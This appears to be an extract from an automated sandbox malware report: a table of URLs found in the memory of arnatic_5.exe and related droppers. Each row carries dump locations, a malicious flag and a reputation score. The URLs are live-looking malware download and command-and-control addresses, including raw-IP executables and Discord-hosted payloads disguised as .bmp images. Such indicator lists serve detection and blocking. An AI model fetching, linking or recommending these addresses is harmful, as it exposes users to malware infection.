http://tg8.cllgxx.com/sr21/siww1047.exev	arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://45.144.225.57/WW/sfx_123_310.exeKd	arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://stylesheet.faseaegasdfase.com/hp8/g1/rtst1053.exe	arnatic_5.exe, 00000013.00000003.421330234.0000000003F53000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406202096.0000000003F1C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488635760.0000000003EB0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405510339.0000000003F1C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488876494.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444387304.0000000000B49000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://zayech.s3.eu-west-1.amazonaws.com:80/HR.exe	arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	false		high
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exe	arnatic_5.exe, 00000013.00000003.427047961.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389209367.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443791496.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.409965913.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404326584.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393435775.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480665699.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422152570.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386699379.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390959002.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432699630.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443329900.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417450531.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427504091.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422705718.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456966893.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432312491.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489778970.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379380319.00000000064DA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://212.193.30.29/WW/file1.exeL	arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/930749897811062804/help1201.bmp	arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	false		high
http://212.193.30.45/WW/file10.exe1d/	arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/931474583054352464/newt.bmp	arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451469784.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429864201.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456916586.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441257967.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432262657.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428067710.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	false		high
http://212.193.30.29/WW/file3.exet	arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/931152760785760336/stalkar_4mo.bmpC82860-4	arnatic_5.exe, 00000013.00000003.416417846.0000000003FA9000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp$	arnatic_5.exe, 00000013.00000003.451469784.00000000064C0000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/910842184708792331/931600723630764112/real1401.bmpC:	arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	false		high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	arnatic_5.exe, 00000013.00000003.402660540.0000000007C48000.00000004.00000001.sdmp	false		high
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeC:	arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://45.144.225.57/WW/search_target1kpd.exevw9	arnatic_5.exe, 00000013.00000003.366605195.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427458418.00000000064C5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443764679.00000000064C5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489749548.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386604830.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379326588.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367209986.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393379953.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432649001.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432285543.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480638589.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456939765.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389109056.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390898314.00000000064C0000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com:80/attachments/910842184708792331/931475805228371968/1234_1401.bmp	arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456992136.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.457136809.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489935493.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480687537.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480807873.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	false		high
https://cdn.discordapp.com:80/attachments/910842184708792331/931269844253442058/LeGXxX6.bmp	arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	false		high
http://212.193.30.29/WW/file1.exe	arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	setup_install.exe, 00000007.00000002.304418108.0000000002714000.00000004.00000001.sdmp, setup_install.exe, 00000007.00000002.304171315.000000000071C000.00000004.00000001.sdmp	false		high
http://45.144.225.57/EU/searchEUunlim.exem	arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.30.45/WW/file8.exeL	arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.30.45/WW/file8.exeM	arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://tg8.cllgxx.com/sr21/siww1047.exe	arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/859162831710846989/864849557661286400/Bear_Vpn.exe	0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_4.exe, 00000011.00000000.300543273.0000000000D32000.00000002.00020000.sdmp	false		high
http://2.56.59.42:80/base/api/getData.php	arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.30.45/WW/file7.exeC:	arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.30.29/WW/file3.exen	arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/928293476800532500/utube0501.bmp	arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.431906507.0000000003F8A000.00000004.00000001.sdmp	false		high
http://45.144.225.57/WW/search_target1kpd.exe	arnatic_5.exe, 00000013.00000003.382115209.0000000003F62000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367209986.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393379953.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432649001.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432285543.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480638589.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456939765.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389109056.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488876494.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390898314.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmpB	arnatic_5.exe, 00000013.00000003.451469784.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429864201.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441257967.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432262657.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428067710.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435620835.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433191051.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445072716.00000000064C0000.00000004.00000001.sdmp	false		high
http://joinarts.top/check.php?publisher=ww2C:	arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://2.56.59.42/base/api/getData.php	arnatic_5.exe, 00000013.00000002.489749548.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487645700.0000000000B49000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481455180.0000000000B49000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444387304.0000000000B49000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.30.29/WW/file2.exe0.exeQd	arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
